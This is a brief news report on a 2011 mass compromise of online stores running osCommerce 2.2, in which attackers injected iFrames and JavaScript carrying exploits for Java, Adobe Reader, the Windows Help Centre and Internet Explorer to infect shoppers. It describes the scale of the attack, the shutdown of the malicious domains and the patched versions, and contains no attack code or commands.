Millions of osCommerce stores hacked

Armorize reports that unknown attackers have exploited numerous online stores that use an old version of osCommerce to deploy malicious code. The attackers reportedly exploited at least three known vulnerabilities in version 2.2 of the open source shop system to gain access to the stores' configuration interfaces. This allowed them to place on the pages first an iFrame and then JavaScript code to infect store visitors with malicious code.

Armorize said that the attackers managed to dramatically increase the number of infected store pages within a very short period of time: while Google only returned 90,000 hits containing the embedded malware when the issue first became known, the number had apparently risen to 3.8 million by last Sunday (31 July), after only a week. However, the hits sometimes also include various sub-pages of the same store. When tested by The H's associates at heise Security on Tuesday afternoon, Google returned 4.5 million infected pages.

The attackers embedded malicious code containing a total of five exploits into the hijacked pages. They targeted holes in Java, Adobe Reader, the Windows Help Centre and Internet Explorer to infect visitors' systems. While all of the vulnerabilities have long since been patched, it is quite likely that visitors may have missed one of the patches because the attackers targeted four programs in total. The domains that were used to deploy the malicious code have now been shut down.

Even online store operators seem to miss the occasional patch: talking to heise Security, osCommerce developer Harald Ponce de Leon confirmed that the holes that were exploited in the attack had been closed when osCommerce was updated to version 2.3 in November 2010. Versions 2.3.1 and 3.0.1 of the shop system have since become available to download.

(djwm)